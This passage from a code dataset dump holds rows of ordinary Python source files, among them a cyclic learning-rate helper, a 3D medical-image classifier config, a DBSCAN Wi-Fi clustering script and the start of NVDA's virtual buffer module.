hexsha
stringlengths 40
40
| size
int64 10
805k
| ext
stringclasses 6
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
176
| max_stars_repo_name
stringlengths 7
114
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
176
| max_issues_repo_name
stringlengths 7
114
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
48.5k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
176
| max_forks_repo_name
stringlengths 7
114
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 10
805k
| avg_line_length
float64 5.53
11k
| max_line_length
int64 10
129k
| alphanum_fraction
float64 0.13
0.93
| content_no_comment
stringlengths 0
449k
| is_comment_constant_removed
bool 2
classes | is_sharp_comment_removed
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f718f388fa6452f78b2f19f1d9e3388c395d791d
| 3,742
|
py
|
Python
|
batchflow/models/tf/nn/train.py
|
bestetc/batchflow
|
d2a843640383fbe860654236881483f755227e06
|
[
"Apache-2.0"
] | null | null | null |
batchflow/models/tf/nn/train.py
|
bestetc/batchflow
|
d2a843640383fbe860654236881483f755227e06
|
[
"Apache-2.0"
] | null | null | null |
batchflow/models/tf/nn/train.py
|
bestetc/batchflow
|
d2a843640383fbe860654236881483f755227e06
|
[
"Apache-2.0"
] | null | null | null |
""" Helpers for training """
from math import pi
import tensorflow as tf
def piecewise_constant(global_step, *args, **kwargs):
""" Constant learning rate decay (uses global_step param instead of x) """
return tf.train.piecewise_constant(global_step, *args, **kwargs)
def cyclic_learning_rate(learning_rate, global_step, max_lr, step_size=10,
mode='tri', name='CyclicLearningRate'):
""" This function varies the learning rate between the
minimum (learning_rate) and the maximum (max_lr).
It returns the decayed learning rate.
Parameters
----------
learning_rate : float or tf.Tensor
The minimum learning rate boundary.
global_step : int or tf.Tensor
Global_step refers to the number of batches seen by the model.
It is use for the cyclic computation. Must not be negative.
max_lr : float or tf.Tensor
The maximum learning rate boundary.
step_size : int or tf.Tensor
The number of iterations in half a cycle (the default is 10).
mode : {'tri', 'sin', 'saw'}
Set the learning rate change function.
name : str
Name of the operation (the default is 'CyclicLearningRate').
Returns
-------
tf.Tensor
Notes
-----
More detailed information about `mode`:
If 'tri':
Default, linearly increasing then linearly decreasing the
learning rate at each cycle. Learning rate starting
from (max_lr-learning_rate)/2 then decreasing to `learning_rate`.
See `Leslie N. Smith, Cyclical Learning Rates for Training Neural Networks
<https://arxiv.org/abs/1506.01186>`_ for more information.
It is computed as::
decayed_learning_rate = abs(mod((global_step + step_size / 4) / step_size, 1) - 0.5) *
2 * (max_lr - learning_rate) +
learning_rate
If 'sin':
Learning rate changes as a sine wave, starting
from (max_lr-learning_rate)/2 then decreasing to `learning_rate`.
It is computed as::
decayed_learning_rate = (learning_rate - max_lr) / 2 *
sin(pi * global_step / step_size) +
(max_lr + learning_rate) / 2
If 'saw':
Learning rate linearly increasing from `learning_rate` to `max_lr`
and then sharply drops to `learning_rate` at each cycle.
Learning rate starting from `learning_rate` then increasing.
It is computed as::
decayed_learning_rate = (max_lr - learning_rate) *
(floor(global_step / step_size) - global_step / step_size) +
learning_rate
"""
with tf.name_scope(name):
learning_rate = tf.cast(learning_rate, dtype=tf.float32)
global_step = tf.cast(global_step, dtype=tf.float32)
step_size = tf.cast(step_size, dtype=tf.float32)
max_lr = tf.cast(max_lr, dtype=tf.float32)
if mode == 'tri':
periodic_comp = tf.mod((global_step + step_size / 4) / step_size, 1)
first_factor = tf.abs(periodic_comp - 0.5)
second_factor = 2 * (max_lr - learning_rate)
second_comp = learning_rate
elif mode == 'sin':
first_factor = (learning_rate - max_lr) / 2.
second_factor = tf.sin((pi * global_step) / step_size)
second_comp = (learning_rate + max_lr) / 2.
elif mode == 'saw':
first_factor = max_lr - learning_rate
second_factor = tf.mod(global_step / step_size, 1)
second_comp = learning_rate
return first_factor * second_factor + second_comp
| 38.979167
| 98
| 0.610369
|
from math import pi
import tensorflow as tf
def piecewise_constant(global_step, *args, **kwargs):
return tf.train.piecewise_constant(global_step, *args, **kwargs)
def cyclic_learning_rate(learning_rate, global_step, max_lr, step_size=10,
mode='tri', name='CyclicLearningRate'):
with tf.name_scope(name):
learning_rate = tf.cast(learning_rate, dtype=tf.float32)
global_step = tf.cast(global_step, dtype=tf.float32)
step_size = tf.cast(step_size, dtype=tf.float32)
max_lr = tf.cast(max_lr, dtype=tf.float32)
if mode == 'tri':
periodic_comp = tf.mod((global_step + step_size / 4) / step_size, 1)
first_factor = tf.abs(periodic_comp - 0.5)
second_factor = 2 * (max_lr - learning_rate)
second_comp = learning_rate
elif mode == 'sin':
first_factor = (learning_rate - max_lr) / 2.
second_factor = tf.sin((pi * global_step) / step_size)
second_comp = (learning_rate + max_lr) / 2.
elif mode == 'saw':
first_factor = max_lr - learning_rate
second_factor = tf.mod(global_step / step_size, 1)
second_comp = learning_rate
return first_factor * second_factor + second_comp
| true
| true
|
f718f3acb3c506bde2a21041343d064a7d260045
| 556
|
py
|
Python
|
tennisscorer/_nbdev.py
|
talksportsdata/tennisscorer
|
d795d0fbcad8ada9581f27b1f569a29562be45b1
|
[
"Apache-2.0"
] | 1
|
2022-01-14T09:04:30.000Z
|
2022-01-14T09:04:30.000Z
|
tennisscorer/_nbdev.py
|
talksportsdata/tennisscorer
|
d795d0fbcad8ada9581f27b1f569a29562be45b1
|
[
"Apache-2.0"
] | null | null | null |
tennisscorer/_nbdev.py
|
talksportsdata/tennisscorer
|
d795d0fbcad8ada9581f27b1f569a29562be45b1
|
[
"Apache-2.0"
] | null | null | null |
# AUTOGENERATED BY NBDEV! DO NOT EDIT!
__all__ = ["index", "modules", "custom_doc_links", "git_url"]
index = {"Scorer": "00_core.ipynb",
"TiebreakScorer": "00_core.ipynb",
"MatchTiebreakScorer": "00_core.ipynb",
"GamePointScorer": "00_core.ipynb",
"SetTracker": "00_core.ipynb",
"MatchTracker": "00_core.ipynb"}
modules = ["core.py"]
doc_url = "https://talksportsdata.github.io/tennisscorer/"
git_url = "https://github.com/talksportsdata/tennisscorer/tree/master/"
def custom_doc_links(name): return None
| 29.263158
| 71
| 0.670863
|
__all__ = ["index", "modules", "custom_doc_links", "git_url"]
index = {"Scorer": "00_core.ipynb",
"TiebreakScorer": "00_core.ipynb",
"MatchTiebreakScorer": "00_core.ipynb",
"GamePointScorer": "00_core.ipynb",
"SetTracker": "00_core.ipynb",
"MatchTracker": "00_core.ipynb"}
modules = ["core.py"]
doc_url = "https://talksportsdata.github.io/tennisscorer/"
git_url = "https://github.com/talksportsdata/tennisscorer/tree/master/"
def custom_doc_links(name): return None
| true
| true
|
f718f4de3b5790aa8494fefb772d4ffabc4a7a81
| 1,506
|
py
|
Python
|
vcontrol/rest/providers/remove.py
|
dannypadilla/vcontrol
|
fe929e6138ec87e23cabd69b5c97ddb29603d0c6
|
[
"Apache-2.0"
] | 5
|
2016-08-01T23:25:18.000Z
|
2019-06-02T00:10:32.000Z
|
vcontrol/rest/providers/remove.py
|
dannypadilla/vcontrol
|
fe929e6138ec87e23cabd69b5c97ddb29603d0c6
|
[
"Apache-2.0"
] | 120
|
2016-08-02T02:00:31.000Z
|
2017-11-01T02:38:11.000Z
|
vcontrol/rest/providers/remove.py
|
dannypadilla/vcontrol
|
fe929e6138ec87e23cabd69b5c97ddb29603d0c6
|
[
"Apache-2.0"
] | 15
|
2016-08-01T23:26:00.000Z
|
2019-11-09T13:17:54.000Z
|
from ..helpers import get_allowed
import os
import web
class RemoveProviderR:
"""
This endpoint allows for removing a provider such as openstack or vmware.
A Vent machine runs on a provider, this will not remove existing Vent
machines on the specified provider. Note that a provider can only be
removed from localhost of the machine running vcontrol unless the
environment variable VCONTROL_OPEN=true is set on the server.
"""
allow_origin, rest_url = get_allowed.get_allowed()
def GET(self, provider):
try:
web.header('Access-Control-Allow-Origin', self.allow_origin)
except Exception as e:
print(e.message)
open_d = os.environ.get('VCONTROL_OPEN')
providers_file_path = os.path.join(os.path.dirname(__file__), 'providers.txt')
if web.ctx.env["HTTP_HOST"] == 'localhost:8080' or open_d == "true":
f = open(providers_file_path,"r")
lines = f.readlines()
f.close()
flag = 0
with open(providers_file_path, 'w') as f:
for line in lines:
if not line.startswith(provider+":"):
f.write(line)
else:
flag = 1
if flag:
return "removed " + provider
else:
return provider + " not found, couldn't remove"
else:
return "must be done from the localhost running vcontrol daemon"
| 38.615385
| 86
| 0.592297
|
from ..helpers import get_allowed
import os
import web
class RemoveProviderR:
allow_origin, rest_url = get_allowed.get_allowed()
def GET(self, provider):
try:
web.header('Access-Control-Allow-Origin', self.allow_origin)
except Exception as e:
print(e.message)
open_d = os.environ.get('VCONTROL_OPEN')
providers_file_path = os.path.join(os.path.dirname(__file__), 'providers.txt')
if web.ctx.env["HTTP_HOST"] == 'localhost:8080' or open_d == "true":
f = open(providers_file_path,"r")
lines = f.readlines()
f.close()
flag = 0
with open(providers_file_path, 'w') as f:
for line in lines:
if not line.startswith(provider+":"):
f.write(line)
else:
flag = 1
if flag:
return "removed " + provider
else:
return provider + " not found, couldn't remove"
else:
return "must be done from the localhost running vcontrol daemon"
| true
| true
|
f718f4ded7275d8e31c1b545e38431a629a433de
| 3,781
|
py
|
Python
|
configs/hie/resnetV1d34_baseconfig_flair.py
|
18152189583/mmclassification-3D
|
61bff05e893f123eae4497f7f1904f7447c65899
|
[
"Apache-2.0"
] | null | null | null |
configs/hie/resnetV1d34_baseconfig_flair.py
|
18152189583/mmclassification-3D
|
61bff05e893f123eae4497f7f1904f7447c65899
|
[
"Apache-2.0"
] | null | null | null |
configs/hie/resnetV1d34_baseconfig_flair.py
|
18152189583/mmclassification-3D
|
61bff05e893f123eae4497f7f1904f7447c65899
|
[
"Apache-2.0"
] | null | null | null |
# dataset settings
dataset_type = 'Hie_Dataset'
# img_norm_cfg = dict(
# mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromNIIFile'),
dict(type='ExtractDataFromObj'),
dict(type='NormalizeMedical', norm_type='full_volume_mean',
instensity_min_val=0.5,
instensity_max_val=99.5),
dict(type='ResizeMedical', size=(160, 160, 80)),
# dict(type='Normalize', **img_norm_cfg),
dict(type='ConcatImage'),
# dict(type='ImageToTensor', keys=['img']),
dict(type='ToTensor', keys=['gt_label', 'img']),
dict(type='Collect', keys=['img', 'gt_label'])
]
test_pipeline = [
dict(type='LoadImageFromNIIFile'),
dict(type='ExtractDataFromObj'),
dict(type='NormalizeMedical', norm_type='full_volume_mean',
instensity_min_val=0.5,
instensity_max_val=99.5),
dict(type='ResizeMedical', size=(160, 160, 80)),
dict(type='ToTensor', keys=['img']),
dict(type='Collect', keys=['img'])
]
data = dict(
samples_per_gpu=8,
workers_per_gpu=8,
train=dict(
type=dataset_type,
data_prefix='/opt/data/private/project/charelchen.cj/workDir/dataset/hie/'
'hie_resample_0.5x0.5x0.5_niigz',
ann_file='/opt/data/private/project/charelchen.cj/workDir/dataset/hie/t1_zw_flair_train.txt',
pipeline=train_pipeline,
modes=['t1_zw']),
val=dict(
type=dataset_type,
data_prefix='/opt/data/private/project/charelchen.cj/workDir/dataset/hie/'
'hie_resample_0.5x0.5x0.5_niigz',
ann_file='/opt/data/private/project/charelchen.cj/workDir/dataset/hie/t1_zw_flair_val.txt',
pipeline=test_pipeline,
modes=['t1_zw']),
test=dict(
# replace `data/val` with `data/test` for standard test
type=dataset_type,
data_prefix='/opt/data/private/project/charelchen.cj/workDir/dataset/hie/'
'hie_resample_0.5x0.5x0.5_niigz',
ann_file='/opt/data/private/project/charelchen.cj/workDir/dataset/hie/t1_zw_flair_val.txt',
pipeline=test_pipeline,
modes=['t1_zw']))
evaluation = dict(interval=2, metric=['accuracy', 'precision', 'recall', 'f1_score', 'support'])
norm_cfg = dict(type='BN3d', requires_grad=True)
conv_cfg = dict(type='Conv3d')
num_classes = 2
# model settings
model = dict(
type='ImageClassifier',
backbone=dict(
type='ResNetV1d',
depth=34,
in_channels=1,
in_dims=3,
num_stages=4,
out_indices=(3, ),
style='pytorch',
norm_cfg=norm_cfg,
conv_cfg=conv_cfg,
init_cfg=[
dict(type='Kaiming', layer=['Conv3d']),
dict(
type='Constant',
val=1,
layer=['_BatchNorm', 'GroupNorm', 'BN3d'])
]
),
neck=dict(type='GlobalAveragePooling', dim=3),
head=dict(
type='LinearClsHead',
num_classes=num_classes,
in_channels=512,
loss=dict(type='CrossEntropyLoss', loss_weight=1.0),
topk=(1,),
))
optimizer = dict(type='SGD', lr=0.1, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=None)
# learning policy
lr_config = dict(policy='step', step=[40, 80, 120])
runner = dict(type='EpochBasedRunner', max_epochs=160)
log_config = dict(
interval=10,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
# yapf:enable
checkpoint_config = dict(by_epoch=True, interval=2)
dist_params = dict(backend='nccl')
log_level = 'INFO'
load_from = None
resume_from = None
workflow = [('train', 1)]
| 34.688073
| 102
| 0.612536
|
dataset_type = 'Hie_Dataset'
train_pipeline = [
dict(type='LoadImageFromNIIFile'),
dict(type='ExtractDataFromObj'),
dict(type='NormalizeMedical', norm_type='full_volume_mean',
instensity_min_val=0.5,
instensity_max_val=99.5),
dict(type='ResizeMedical', size=(160, 160, 80)),
dict(type='ConcatImage'),
dict(type='ToTensor', keys=['gt_label', 'img']),
dict(type='Collect', keys=['img', 'gt_label'])
]
test_pipeline = [
dict(type='LoadImageFromNIIFile'),
dict(type='ExtractDataFromObj'),
dict(type='NormalizeMedical', norm_type='full_volume_mean',
instensity_min_val=0.5,
instensity_max_val=99.5),
dict(type='ResizeMedical', size=(160, 160, 80)),
dict(type='ToTensor', keys=['img']),
dict(type='Collect', keys=['img'])
]
data = dict(
samples_per_gpu=8,
workers_per_gpu=8,
train=dict(
type=dataset_type,
data_prefix='/opt/data/private/project/charelchen.cj/workDir/dataset/hie/'
'hie_resample_0.5x0.5x0.5_niigz',
ann_file='/opt/data/private/project/charelchen.cj/workDir/dataset/hie/t1_zw_flair_train.txt',
pipeline=train_pipeline,
modes=['t1_zw']),
val=dict(
type=dataset_type,
data_prefix='/opt/data/private/project/charelchen.cj/workDir/dataset/hie/'
'hie_resample_0.5x0.5x0.5_niigz',
ann_file='/opt/data/private/project/charelchen.cj/workDir/dataset/hie/t1_zw_flair_val.txt',
pipeline=test_pipeline,
modes=['t1_zw']),
test=dict(
type=dataset_type,
data_prefix='/opt/data/private/project/charelchen.cj/workDir/dataset/hie/'
'hie_resample_0.5x0.5x0.5_niigz',
ann_file='/opt/data/private/project/charelchen.cj/workDir/dataset/hie/t1_zw_flair_val.txt',
pipeline=test_pipeline,
modes=['t1_zw']))
evaluation = dict(interval=2, metric=['accuracy', 'precision', 'recall', 'f1_score', 'support'])
norm_cfg = dict(type='BN3d', requires_grad=True)
conv_cfg = dict(type='Conv3d')
num_classes = 2
model = dict(
type='ImageClassifier',
backbone=dict(
type='ResNetV1d',
depth=34,
in_channels=1,
in_dims=3,
num_stages=4,
out_indices=(3, ),
style='pytorch',
norm_cfg=norm_cfg,
conv_cfg=conv_cfg,
init_cfg=[
dict(type='Kaiming', layer=['Conv3d']),
dict(
type='Constant',
val=1,
layer=['_BatchNorm', 'GroupNorm', 'BN3d'])
]
),
neck=dict(type='GlobalAveragePooling', dim=3),
head=dict(
type='LinearClsHead',
num_classes=num_classes,
in_channels=512,
loss=dict(type='CrossEntropyLoss', loss_weight=1.0),
topk=(1,),
))
optimizer = dict(type='SGD', lr=0.1, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=None)
lr_config = dict(policy='step', step=[40, 80, 120])
runner = dict(type='EpochBasedRunner', max_epochs=160)
log_config = dict(
interval=10,
hooks=[
dict(type='TextLoggerHook'),
])
checkpoint_config = dict(by_epoch=True, interval=2)
dist_params = dict(backend='nccl')
log_level = 'INFO'
load_from = None
resume_from = None
workflow = [('train', 1)]
| true
| true
|
f718f5aea68f8f5d6c62ecc3b4f133324fe5e627
| 1,000
|
py
|
Python
|
setup.py
|
bsatrom/blues-notecard
|
1ad4ebc7fd7cb2bc220a505e6066a551f51fe4d4
|
[
"MIT"
] | null | null | null |
setup.py
|
bsatrom/blues-notecard
|
1ad4ebc7fd7cb2bc220a505e6066a551f51fe4d4
|
[
"MIT"
] | 1
|
2021-02-12T10:57:00.000Z
|
2021-02-12T10:57:00.000Z
|
setup.py
|
bsatrom/blues-notecard
|
1ad4ebc7fd7cb2bc220a505e6066a551f51fe4d4
|
[
"MIT"
] | 1
|
2021-02-10T19:51:48.000Z
|
2021-02-10T19:51:48.000Z
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="note-python",
version="1.3.0",
author="Blues Inc.",
author_email="support@blues.com",
description="Cross-platform Python Library for the Blues Wireless Notecard,",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/blues/note-python",
packages=setuptools.find_packages(),
license="MIT",
classifiers=[
"Programming Language :: Python",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Intended Audience :: Developers",
"Natural Language :: English",
],
install_requires=["filelock"],
python_requires='>=3.5',
)
| 33.333333
| 81
| 0.638
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="note-python",
version="1.3.0",
author="Blues Inc.",
author_email="support@blues.com",
description="Cross-platform Python Library for the Blues Wireless Notecard,",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/blues/note-python",
packages=setuptools.find_packages(),
license="MIT",
classifiers=[
"Programming Language :: Python",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Intended Audience :: Developers",
"Natural Language :: English",
],
install_requires=["filelock"],
python_requires='>=3.5',
)
| true
| true
|
f718f67accd3c8664e57d618ee604d999d66ea44
| 1,424
|
py
|
Python
|
SpringSemester2021/14_Exercises/Ex14_Clust-01_Sol.py
|
KretschiGL/DataScienceLecture
|
e6bbb3efd531b08aa4757fb6e89d12e959678a44
|
[
"MIT"
] | 1
|
2021-05-09T11:02:35.000Z
|
2021-05-09T11:02:35.000Z
|
SpringSemester2021/14_Exercises/Ex14_Clust-01_Sol.py
|
KretschiGL/DataScienceLecture
|
e6bbb3efd531b08aa4757fb6e89d12e959678a44
|
[
"MIT"
] | null | null | null |
SpringSemester2021/14_Exercises/Ex14_Clust-01_Sol.py
|
KretschiGL/DataScienceLecture
|
e6bbb3efd531b08aa4757fb6e89d12e959678a44
|
[
"MIT"
] | 1
|
2020-05-26T15:35:40.000Z
|
2020-05-26T15:35:40.000Z
|
# Init Solution
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
%matplotlib inline
import seaborn as sns
sns.set()
from IPython.display import display, Markdown
# Init Solution completed
from sklearn.cluster import DBSCAN
from sklearn.base import clone
display(Markdown("###### Loading Wi-Fi Data"))
data = pd.read_csv("./Ex14_Clust-01_Data.csv")
display(data.head(5))
display(Markdown("###### NYC Plot"))
fig, ax = plt.subplots(figsize=(20,20))
data.plot.scatter("Longitude", "Latitude", ax=ax, c="b")
fig.suptitle("Wi-Fi Hotspots in NYC")
plt.show()
display(Markdown("###### Clustering"))
def clustering(data, model, metric, ax):
m = clone(model)
m.set_params(metric=metric)
l_pred = m.fit_predict(data)
n_cluster = len(np.unique(l_pred))
data_cluster = data[l_pred != -1]
label_cluster = l_pred[l_pred != -1]
data_outlier = data[l_pred == -1]
data_outlier.plot.scatter("Longitude", "Latitude", ax=ax, c="k", alpha=.5)
data_cluster.plot.scatter("Longitude", "Latitude", ax=ax, c=label_cluster, cmap="rainbow", colorbar=False)
ax.set(title=f"Found {n_cluster} clusters with distance metric {metric}")
model = DBSCAN(eps=.005)
data_coord = data[["Longitude", "Latitude"]]
fig, ax = plt.subplots(1,2,figsize=(20,10))
clustering(data_coord, model, "euclidean", ax[0])
clustering(data_coord, model, "manhattan", ax[1])
fig.suptitle("Wi-Fi Clusters in NYC")
| 31.644444
| 110
| 0.707163
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
%matplotlib inline
import seaborn as sns
sns.set()
from IPython.display import display, Markdown
from sklearn.cluster import DBSCAN
from sklearn.base import clone
display(Markdown("###### Loading Wi-Fi Data"))
data = pd.read_csv("./Ex14_Clust-01_Data.csv")
display(data.head(5))
display(Markdown("###### NYC Plot"))
fig, ax = plt.subplots(figsize=(20,20))
data.plot.scatter("Longitude", "Latitude", ax=ax, c="b")
fig.suptitle("Wi-Fi Hotspots in NYC")
plt.show()
display(Markdown("###### Clustering"))
def clustering(data, model, metric, ax):
m = clone(model)
m.set_params(metric=metric)
l_pred = m.fit_predict(data)
n_cluster = len(np.unique(l_pred))
data_cluster = data[l_pred != -1]
label_cluster = l_pred[l_pred != -1]
data_outlier = data[l_pred == -1]
data_outlier.plot.scatter("Longitude", "Latitude", ax=ax, c="k", alpha=.5)
data_cluster.plot.scatter("Longitude", "Latitude", ax=ax, c=label_cluster, cmap="rainbow", colorbar=False)
ax.set(title=f"Found {n_cluster} clusters with distance metric {metric}")
model = DBSCAN(eps=.005)
data_coord = data[["Longitude", "Latitude"]]
fig, ax = plt.subplots(1,2,figsize=(20,10))
clustering(data_coord, model, "euclidean", ax[0])
clustering(data_coord, model, "manhattan", ax[1])
fig.suptitle("Wi-Fi Clusters in NYC")
| false
| true
|
f718f6c4067656037123e38cebf5af9768e2732f
| 28,363
|
py
|
Python
|
source/virtualBuffers/__init__.py
|
GdePaulo/nvda
|
71c385eae1d7f77c47a0871a690c1142c4c724e2
|
[
"bzip2-1.0.6"
] | 6
|
2021-03-08T07:28:08.000Z
|
2022-02-23T02:48:23.000Z
|
source/virtualBuffers/__init__.py
|
GdePaulo/nvda
|
71c385eae1d7f77c47a0871a690c1142c4c724e2
|
[
"bzip2-1.0.6"
] | null | null | null |
source/virtualBuffers/__init__.py
|
GdePaulo/nvda
|
71c385eae1d7f77c47a0871a690c1142c4c724e2
|
[
"bzip2-1.0.6"
] | 2
|
2021-07-16T00:25:27.000Z
|
2022-03-24T08:36:36.000Z
|
# -*- coding: UTF-8 -*-
#virtualBuffers/__init__.py
#A part of NonVisual Desktop Access (NVDA)
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
#Copyright (C) 2007-2017 NV Access Limited, Peter Vágner
import time
import threading
import ctypes
import collections
import itertools
import weakref
import wx
import review
import NVDAHelper
import XMLFormatting
import scriptHandler
from scriptHandler import isScriptWaiting, willSayAllResume
import speech
import NVDAObjects
import api
import sayAllHandler
import controlTypes
import textInfos.offsets
import config
import cursorManager
import browseMode
import gui
import eventHandler
import braille
import queueHandler
from logHandler import log
import ui
import aria
import nvwave
import treeInterceptorHandler
import watchdog
from abc import abstractmethod
VBufStorage_findDirection_forward=0
VBufStorage_findDirection_back=1
VBufStorage_findDirection_up=2
VBufRemote_nodeHandle_t=ctypes.c_ulonglong
class VBufStorage_findMatch_word(str):
pass
VBufStorage_findMatch_notEmpty = object()
FINDBYATTRIBS_ESCAPE_TABLE = {
# Symbols that are escaped in the attributes string.
ord(u":"): r"\\:",
ord(u";"): r"\\;",
ord(u"\\"): u"\\\\\\\\",
}
# Symbols that must be escaped for a regular expression.
FINDBYATTRIBS_ESCAPE_TABLE.update({(ord(s), u"\\" + s) for s in u"^$.*+?()[]{}|"})
def _prepareForFindByAttributes(attribs):
# A lambda that coerces a value to a string and escapes characters suitable for a regular expression.
escape = lambda val: str(val).translate(FINDBYATTRIBS_ESCAPE_TABLE)
reqAttrs = []
regexp = []
if isinstance(attribs, dict):
# Single option.
attribs = (attribs,)
# All options will match against all requested attributes,
# so first build the list of requested attributes.
for option in attribs:
for name in option:
reqAttrs.append(name)
# Now build the regular expression.
for option in attribs:
optRegexp = []
for name in reqAttrs:
optRegexp.append("%s:" % escape(name))
values = option.get(name)
if not values:
# The value isn't tested for this attribute, so match any (or no) value.
optRegexp.append(r"(?:\\;|[^;])*;")
elif values[0] is VBufStorage_findMatch_notEmpty:
# There must be a value for this attribute.
optRegexp.append(r"(?:\\;|[^;])+;")
elif isinstance(values[0], VBufStorage_findMatch_word):
# Assume all are word matches.
optRegexp.append(r"(?:\\;|[^;])*\b(?:")
optRegexp.append("|".join(escape(val) for val in values))
optRegexp.append(r")\b(?:\\;|[^;])*;")
else:
# Assume all are exact matches or None (must not exist).
optRegexp.append("(?:" )
optRegexp.append("|".join((escape(val)+u';') if val is not None else u';' for val in values))
optRegexp.append(")")
regexp.append("".join(optRegexp))
return u" ".join(reqAttrs), u"|".join(regexp)
class VirtualBufferQuickNavItem(browseMode.TextInfoQuickNavItem):
def __init__(self,itemType,document,vbufNode,startOffset,endOffset):
textInfo=document.makeTextInfo(textInfos.offsets.Offsets(startOffset,endOffset))
super(VirtualBufferQuickNavItem,self).__init__(itemType,document,textInfo)
docHandle=ctypes.c_int()
ID=ctypes.c_int()
NVDAHelper.localLib.VBuf_getIdentifierFromControlFieldNode(document.VBufHandle, vbufNode, ctypes.byref(docHandle), ctypes.byref(ID))
self.vbufFieldIdentifier=(docHandle.value,ID.value)
self.vbufNode=vbufNode
@property
def obj(self):
return self.document.getNVDAObjectFromIdentifier(*self.vbufFieldIdentifier)
@property
def label(self):
attrs = {}
def propertyGetter(prop):
if not attrs:
# Lazily fetch the attributes the first time they're needed.
# We do this because we don't want to do this if they're not needed at all.
attrs.update(self.textInfo._getControlFieldAttribs(self.vbufFieldIdentifier[0], self.vbufFieldIdentifier[1]))
return attrs.get(prop)
return self._getLabelForProperties(propertyGetter)
def isChild(self,parent):
if self.itemType == "heading":
try:
if (int(self.textInfo._getControlFieldAttribs(self.vbufFieldIdentifier[0], self.vbufFieldIdentifier[1])["level"])
> int(parent.textInfo._getControlFieldAttribs(parent.vbufFieldIdentifier[0], parent.vbufFieldIdentifier[1])["level"])):
return True
except (KeyError, ValueError, TypeError):
return False
return super(VirtualBufferQuickNavItem,self).isChild(parent)
class VirtualBufferTextInfo(browseMode.BrowseModeDocumentTextInfo,textInfos.offsets.OffsetsTextInfo):
allowMoveToOffsetPastEnd=False #: no need for end insertion point as vbuf is not editable.
def _getControlFieldAttribs(self, docHandle, id):
info = self.copy()
info.expand(textInfos.UNIT_CHARACTER)
for field in reversed(info.getTextWithFields()):
if not (isinstance(field, textInfos.FieldCommand) and field.command == "controlStart"):
# Not a control field.
continue
attrs = field.field
if int(attrs["controlIdentifier_docHandle"]) == docHandle and int(attrs["controlIdentifier_ID"]) == id:
return attrs
raise LookupError
def _getFieldIdentifierFromOffset(self, offset):
startOffset = ctypes.c_int()
endOffset = ctypes.c_int()
docHandle = ctypes.c_int()
ID = ctypes.c_int()
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_locateControlFieldNodeAtOffset(self.obj.VBufHandle, offset, ctypes.byref(startOffset), ctypes.byref(endOffset), ctypes.byref(docHandle), ctypes.byref(ID),ctypes.byref(node))
if not any((docHandle.value, ID.value)):
raise LookupError("Neither docHandle nor ID found for offset %d" % offset)
return docHandle.value, ID.value
def _getOffsetsFromFieldIdentifier(self, docHandle, ID):
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_getControlFieldNodeWithIdentifier(self.obj.VBufHandle, docHandle, ID,ctypes.byref(node))
if not node:
raise LookupError
start = ctypes.c_int()
end = ctypes.c_int()
NVDAHelper.localLib.VBuf_getFieldNodeOffsets(self.obj.VBufHandle, node, ctypes.byref(start), ctypes.byref(end))
return start.value, end.value
def _getBoundingRectFromOffset(self,offset):
o = self._getNVDAObjectFromOffset(offset)
if not o:
raise LookupError("no NVDAObject at offset %d" % offset)
if o.hasIrrelevantLocation:
raise LookupError("Object is off screen, invisible or has no location")
return o.location
def _getNVDAObjectFromOffset(self,offset):
try:
docHandle,ID=self._getFieldIdentifierFromOffset(offset)
except LookupError:
log.debugWarning("Couldn't get NVDAObject from offset %d" % offset)
return None
return self.obj.getNVDAObjectFromIdentifier(docHandle,ID)
def _getOffsetsFromNVDAObjectInBuffer(self,obj):
docHandle,ID=self.obj.getIdentifierFromNVDAObject(obj)
return self._getOffsetsFromFieldIdentifier(docHandle,ID)
def _getOffsetsFromNVDAObject(self, obj):
while True:
try:
return self._getOffsetsFromNVDAObjectInBuffer(obj)
except LookupError:
pass
# Interactive list/combo box/tree view descendants aren't rendered into the buffer, even though they are still considered part of it.
# Use the container in this case.
obj = obj.parent
if not obj or obj.role not in (controlTypes.ROLE_LIST, controlTypes.ROLE_COMBOBOX, controlTypes.ROLE_GROUPING, controlTypes.ROLE_TREEVIEW, controlTypes.ROLE_TREEVIEWITEM):
break
raise LookupError
def __init__(self,obj,position):
self.obj=obj
super(VirtualBufferTextInfo,self).__init__(obj,position)
